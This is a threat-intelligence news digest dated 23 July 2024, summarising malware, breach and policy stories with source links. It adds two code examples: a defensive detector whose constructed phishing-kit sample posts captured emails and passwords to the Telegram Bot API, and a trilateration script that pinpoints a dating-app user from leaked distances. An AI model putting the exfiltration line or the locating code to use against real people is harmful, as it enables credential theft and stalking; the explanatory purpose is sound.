Cyber Threat Intelligence 23 July 2024
New Tooling
- Shuffle Automation: Open-Source Security Automation Platform
"Shuffle is an open-source automation platform designed by and for security professionals. While security operations are inherently complex, Shuffle simplifies the process. It’s designed to integrate with Managed Security Service Providers (MSSPs) and other service providers."
https://www.helpnetsecurity.com/2024/07/22/shuffle-automation-open-source-security-automation-platform/
https://github.com/Shuffle/Shuffle
Malware
- Fake Browser Updates Lead To BOINC Volunteer Computing Software
"Beginning on July 4, 2024, Huntress observed new behaviors in conjunction with malware typically called SocGholish or FakeUpdates. This is a large malware group, with a number of new campaigns and similar malware emerging over the past couple of years. Huntress has written about SocGholish previously, and many of these same behaviors haven’t changed. The infections typically begin as a result of a user visiting a compromised website, which results in a fake browser update prompt to the user."
https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
https://thehackernews.com/2024/07/socgholish-malware-exploits-boinc.html
https://securityaffairs.com/166030/malware/socgholish-used-deliver-asyncrat.html
- Cursed Tapes: Exploiting The EvilVideo Vulnerability On Telegram For Android
"ESET researchers discovered a zero-day exploit that targets Telegram for Android, which appeared for sale for an unspecified price in an underground forum post from June 6th, 2024. Using the exploit to abuse a vulnerability that we named EvilVideo, attackers could share malicious Android payloads via Telegram channels, groups, and chat, and make them appear as multimedia files."
https://www.welivesecurity.com/en/eset-research/cursed-tapes-exploiting-evilvideo-vulnerability-telegram-android/
https://therecord.media/telegram-zero-day-android-app-eset
https://www.bleepingcomputer.com/news/security/telegram-zero-day-allowed-sending-malicious-android-apks-as-videos/
https://hackread.com/telegram-android-vulnerability-evilvideo-malware-videos/
https://securityaffairs.com/166042/hacking/evilvideo-telegram-android-zero-day.html
- Threat Actors Use Telegram APIs For Harvesting Credentials
"In recent weeks, there has been an increase in phishing attacks, conducted through messaging platforms like Telegram. Telegram is a widely used app that allows users to send messages, photos, videos, and other files online. It also provides APIs for developers to create custom bots and applications. Unfortunately, these APIs can also attract threat actors who use them for illicit purposes, such as stealing credentials."
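The abuse described in the Forcepoint item is a phishing page or kit that posts captured form fields straight to the Telegram Bot API. The following detector is an added example, not Forcepoint's code: it scans kit source or captured page text for `api.telegram.org/bot<token>/<method>` calls, records only a bot id and a token fingerprint (so the secret never lands in a ticket), and pulls out any hard-coded `chat_id`. The Bot API URL shape is real; the sample kit text, the token and the chat id are constructed for this demo, and the token length/alphabet the regex accepts is an assumption.

```python
"""Spot Telegram Bot API credential exfiltration in phishing-kit source.

Added example, not Forcepoint's code. The URL shape
https://api.telegram.org/bot<token>/<method> is real; the sample kit,
the token and the chat id below are constructed for this demo.
"""
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass

# Bot token = "<numeric bot id>:<secret>". The secret length/alphabet here is an
# assumption based on commonly seen tokens; widen it if you observe misses.
TOKEN_RE = r"(?P<token>\d{8,10}:[A-Za-z0-9_-]{30,})"
API_CALL_RE = re.compile(
    r"api\.telegram\.org/bot" + TOKEN_RE + r"/(?P<method>send\w+|forward\w+|getUpdates)",
    re.IGNORECASE,
)
# chat_id may be a query parameter, a JSON key or a PHP/JS assignment; the
# character class deliberately excludes "-" so negative (group) ids keep their sign.
CHAT_ID_RE = re.compile(r"chat_id[^\w-]{0,4}(?P<chat_id>-?\d{5,})")


@dataclass(frozen=True)
class TelegramExfil:
    line_no: int
    method: str
    bot_id: str    # safe to record: identifies the bot but is not a usable secret
    token_fp: str  # sha256 prefix of the full token, for correlating kits


def find_telegram_exfil(text: str) -> list[TelegramExfil]:
    """Return one finding per Bot API call found in the text, secret redacted."""
    hits: list[TelegramExfil] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for m in API_CALL_RE.finditer(line):
            token = m.group("token")
            hits.append(TelegramExfil(
                line_no=line_no,
                method=m.group("method"),
                bot_id=token.split(":", 1)[0],
                token_fp=hashlib.sha256(token.encode()).hexdigest()[:12],
            ))
    return hits


def extract_chat_ids(text: str) -> list[str]:
    """Hard-coded destination chats (the operator's channel or group), deduplicated."""
    return sorted({m.group("chat_id") for m in CHAT_ID_RE.finditer(text)})


# Constructed sample modelled on a kit "sender" file: a PHP exfil line plus a
# JS fetch that ships a captured file. Neither the token nor the chat id is real.
BOT_TOKEN = "7123456789:AAF1xY2z" + "B" * 27
SAMPLE_TEMPLATE = """\
<?php
// constructed sample: phishing-kit sender
$msg = "Login: " . $_POST['email'] . " Pass: " . $_POST['password'];
file_get_contents("https://api.telegram.org/bot{TOKEN}/sendMessage?chat_id=-1009876543210&text=" . urlencode($msg));
?>
<script>
fetch("https://api.telegram.org/bot{TOKEN}/sendDocument", {method: "POST", body: fd});
</script>
"""
SAMPLE_KIT = SAMPLE_TEMPLATE.replace("{TOKEN}", BOT_TOKEN)

if __name__ == "__main__":
    for hit in find_telegram_exfil(SAMPLE_KIT):
        print(f"line {hit.line_no}: {hit.method} via bot {hit.bot_id} (token fp {hit.token_fp})")
    print("destination chat ids:", extract_chat_ids(SAMPLE_KIT))
```

A hit in a public-facing login form is a strong indicator on its own; on the network side, `api.telegram.org` is rarely a legitimate destination for a web server, so an egress deny for that host (or a proxy alert on it) catches this class of kit regardless of token.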
https://www.forcepoint.com/blog/insights/threat-actors-harvesting-credentials-telegram-api
- Gambling Is No Game: DNS Links Between Chinese Organized Crime And Sports Sponsorships
"This groundbreaking report unveils the discovery of a technology suite and its connection to Chinese organized crime, money laundering, and human trafficking throughout Southeast Asia. The technology suite is composed of software, Domain Name System (DNS) configurations, website hosting, payment mechanisms, mobile apps, and more—a full cybercrime supply chain. Tens of seemingly unrelated gambling brands that advertise by way of sponsorship deals with European sports teams use this technology."
https://blogs.infoblox.com/threat-intelligence/gambling-is-no-game-dns-links-between-chinese-organized-crime-and-sports-sponsorships/
https://insights.infoblox.com/resources-report/infoblox-report-vigorish-viper-a-venomous-bet
https://thehackernews.com/2024/07/experts-uncover-chinese-cybercrime.html
https://therecord.media/chinese-cybercrime-syndicate-gambling-football-europe
https://hackread.com/chinese-vigorish-viper-dns-football-illegal-gambling/
- PINEAPPLE And FLUXROOT Hacker Groups Abuse Google Cloud For Credential Phishing
"A Latin America (LATAM)-based financially motivated actor codenamed FLUXROOT has been observed leveraging Google Cloud serverless projects to orchestrate credential phishing activity, highlighting the abuse of the cloud computing model for malicious purposes. "Serverless architectures are attractive to developers and enterprises for their flexibility, cost effectiveness, and ease of use," Google said in its biannual Threat Horizons Report [PDF] shared with The Hacker News."
https://thehackernews.com/2024/07/pineapple-and-fluxroot-hacker-groups.html
https://services.google.com/fh/files/misc/threat_horizons_report_h2_2024.pdf
- From RA Group To RA World: Evolution Of a Ransomware Group
"The ransomware group RA Group, now known as RA World, showed a noticeable uptick in their activity since March 2024. About 37% of all posts on their dark web leak site have appeared since March, suggesting this is an emerging group to watch. This article describes the tactics, techniques and procedures (TTPs) used by RA World."
https://unit42.paloaltonetworks.com/ra-world-ransomware-group-updates-tool-set/
Breaches/Hacks/Leaks
- Greece’s Land Registry Agency Breached In Wave Of 400 Cyberattacks
"The Land Registry agency in Greece has announced that it suffered a limited-scope data breach following a wave of 400 cyberattacks targeting its IT infrastructure over the last week. The agency said hackers managed to compromise employee terminals and steal 1.2 GB of data, corresponding to roughly 0.0006% of the total data held by the government organization. The stolen data reportedly does not contain any citizens' personal information but primarily consists of typical administrative documents, the exposure of which is not expected to impact the registry's operations."
https://www.bleepingcomputer.com/news/security/greeces-land-registry-agency-breached-in-wave-of-400-cyberattacks/
- Los Angeles Superior Court Shuts Down After Ransomware Attack
"The largest trial court in the United States, the Superior Court of Los Angeles County, closed all 36 courthouse locations on Monday to restore systems affected by a Friday ransomware attack. The attack, which has not yet been claimed by a ransomware operation, affected the entire network of the Los Angeles Superior Court. This includes external systems like the MyJuryDuty Portal and its website and internal systems like the case management systems."
https://www.bleepingcomputer.com/news/security/los-angeles-superior-court-shuts-down-after-ransomware-attack/
https://therecord.media/la-county-system-ransomware-closed-monday
https://hackread.com/ransomware-attack-la-county-courts-halt-inmate-transfer/
https://www.securityweek.com/california-officials-say-largest-trial-court-in-us-victim-of-ransomware-attack/
https://www.theregister.com/2024/07/22/ransomware_la_county_superior_court/
- Safety Equipment Giant Cadre Holdings Hit By Cyberattack
"Florida-based safety equipment giant Cadre Holdings on Friday disclosed a cyberattack that has impacted some of the company’s operations. Cadre provides safety and survivability products for first responders, federal agencies, outdoor recreation, and personal protection in over 100 countries. Its products include body armor, bomb squad equipment, duty gear, and nuclear safety solutions."
https://www.securityweek.com/safety-equipment-giant-cadre-holdings-hit-by-cyberattack/
General News
- Under-Resourced Maintainers Pose Risk To Africa's Open Source Push
"During a two-day conference at the United Nations in New York City last week, technologists and global policy makers expounded on the benefits that open source software (OSS) can provide to the world, particularly when it comes to delivering affordable technology to underserved nations in Africa and beyond. But to make the most of the OSS promise, security has to go hand in hand with app development."
https://www.darkreading.com/application-security/under-resourced-maintainers-pose-risk-to-africas-open-source-push
- Cross-Industry Standards For Data Provenance In AI
"In this Help Net Security interview, Saira Jesani, Executive Director of the Data & Trust Alliance, discusses the role of data provenance in AI trustworthiness and its impact on AI models’ performance and reliability. Jesani highlights the collaborative process behind developing cross-industry metadata standards to address widespread data provenance challenges and ensure applicability across various sectors."
https://www.helpnetsecurity.com/2024/07/22/saira-jesani-data-trust-alliance-data-provenance-standards/
- NCA Infiltrates World's Most Prolific DDoS-For-Hire Service
"The National Crime Agency has infiltrated a significant DDoS-for-hire service which has been responsible for tens of thousands of attacks every week across the globe. The disruption targeting digitalstress.su, a criminal marketplace offering DDoS capabilities, was made in partnership with the Police Service of Northern Ireland. It comes after the PSNI arrested one of the site’s suspected controllers earlier this month."
https://www.nationalcrimeagency.gov.uk/news/nca-infiltrates-world-s-most-prolific-ddos-for-hire-service
https://www.bleepingcomputer.com/news/security/police-infiltrates-takes-down-digitalstress-ddos-for-hire-service/
https://therecord.media/ddos-for-hire-site-digitalstress-takedown-arrest-uk-nca
https://www.theregister.com/2024/07/22/ddos_for_hire_shutdown/
- Spain Arrests Three For Using DDoSia Hacktivist Platform
"The Spanish authorities have arrested three individuals for using DDoSia, a distributed denial of service platform operated by pro-Russian hacktivists, to conduct DDoS attacks against governments and organizations in NATO countries. The arrests were made in the suspects' homes in Seville, Huelva, and Manacor. The police also confiscated various computer equipment and documents of interest to be used in the ensuing investigations."
https://www.bleepingcomputer.com/news/security/spain-arrests-three-for-using-ddosia-hacktivist-platform/
https://therecord.media/spain-arrest-noname-russia-hackers
- Swipe Right For Data Leaks: Dating Apps Expose Location, More
"Apps like Tinder, Bumble, Grindr, Badoo, OKCupid, MeetMe, and Hinge all have API vulnerabilities that expose sensitive user data, and six allow a threat actor to pinpoint exactly where someone is."
https://www.darkreading.com/application-security/swipe-right-for-data-leaks-dating-apps-expose-location-more
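The "pinpoint exactly where someone is" finding rests on a simple geometric fact: if an app's API tells an attacker-controlled account how far away the target is, three such measurements from chosen positions fix the target's position by trilateration, and rounding the distance (a common mitigation) only widens the result to tens of metres. The code below is an added example, not the researchers' tooling: it assumes an API that returns distance to the target (exact or rounded to a fixed step) and models that API with a local function, since the real endpoints are not reproduced here; probe positions, the target and the rounding step are constructed.

```python
"""Trilaterating a user from distances leaked by a location-based app.

Added example, not the paper's or the article's code. Assumes the attacker
can place accounts at chosen positions ("probes") and that the API returns
the distance from each probe to the target, exact or rounded to `step_m`.
Positions are metres on a local flat-earth grid; within a few km that is
accurate enough for this purpose.
"""
from __future__ import annotations

import math

Point = tuple[float, float]  # (east, north) in metres


def distance(a: Point, b: Point) -> float:
    return math.hypot(a[0] - b[0], a[1] - b[1])


def app_reports_distance(target: Point, probe: Point, step_m: float = 0.0) -> float:
    """Constructed stand-in for the leaking API: exact distance, or rounded to
    the nearest `step_m` metres when the app tries to blur it."""
    d = distance(target, probe)
    return d if step_m <= 0 else round(d / step_m) * step_m


def trilaterate(probes: list[Point], dists: list[float]) -> Point:
    """Least-squares trilateration from three or more probes.

    Subtracting the first circle equation from each other one removes the
    quadratic terms and leaves a linear system in (x, y):
        2(xi-x1)x + 2(yi-y1)y = (xi^2-x1^2) + (yi^2-y1^2) + d1^2 - di^2
    which is solved here through the 2x2 normal equations (no numpy needed).
    """
    if len(probes) < 3 or len(probes) != len(dists):
        raise ValueError("need at least three probes with matching distances")
    (x1, y1), d1 = probes[0], dists[0]
    rows = []
    for (xi, yi), di in zip(probes[1:], dists[1:]):
        a, b = 2 * (xi - x1), 2 * (yi - y1)
        c = (xi**2 - x1**2) + (yi**2 - y1**2) + d1**2 - di**2
        rows.append((a, b, c))
    saa = sum(a * a for a, _, _ in rows)
    sab = sum(a * b for a, b, _ in rows)
    sbb = sum(b * b for _, b, _ in rows)
    sac = sum(a * c for a, _, c in rows)
    sbc = sum(b * c for _, b, c in rows)
    det = saa * sbb - sab * sab
    if abs(det) < 1e-9:
        raise ValueError("probes are collinear; pick a non-degenerate layout")
    x = (sac * sbb - sbc * sab) / det
    y = (saa * sbc - sab * sac) / det
    return (x, y)


def locate(target: Point, probes: list[Point], step_m: float = 0.0) -> tuple[Point, float]:
    """Run the attack end to end against the modelled API; returns (estimate, error in m)."""
    dists = [app_reports_distance(target, p, step_m) for p in probes]
    est = trilaterate(probes, dists)
    return est, distance(est, target)


# Constructed scenario: three probes 1 km apart around a target at (300, 400).
PROBES: list[Point] = [(0.0, 0.0), (1000.0, 0.0), (0.0, 1000.0)]
TARGET: Point = (300.0, 400.0)

if __name__ == "__main__":
    for step in (0.0, 100.0):
        est, err = locate(TARGET, PROBES, step)
        print(f"rounding {step:>5.0f} m -> estimate ({est[0]:.1f}, {est[1]:.1f}), error {err:.1f} m")
```

With exact distances the estimate is the true position; with distances rounded to 100 m it lands about 20 m off, which is still a street address. Rounding the distance therefore does not fix the leak; the fix is not to expose attacker-queryable distances at all (coarse grid cells or server-side "nearby" decisions that never return a number).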
https://lepoch.at/files/dating-apps-usesec24.pdf
- Fragmented And Multiplied Cybercriminal Landscape, Warns New Europol Report
"Today, Europol publishes the 10th edition of the Internet Organised Crime Threat Assessment (IOCTA), an in-depth assessment of the key developments, changes and emerging threats in cybercrime over the last year. The report highlights relevant trends in crime areas such as cyber-attacks, child sexual exploitation and online and payment fraud schemes. It also provides an outlook of what can be expected in the near future, especially regarding new technologies, payment systems, AI, cryptocurrencies and illicit content online."
https://www.europol.europa.eu/media-press/newsroom/news/fragmented-and-multiplied-cybercriminal-landscape-warns-new-europol-report
http://www.europol.europa.eu/cms/sites/default/files/documents/IOCTA 2024 - EN_0.pdf
https://www.infosecurity-magazine.com/news/ransomware-groups-fragment-rising/
https://www.theregister.com/2024/07/22/europol_says_ransomware_takedowns_make/
Reference
Electronic Transactions Development Agency (ETDA)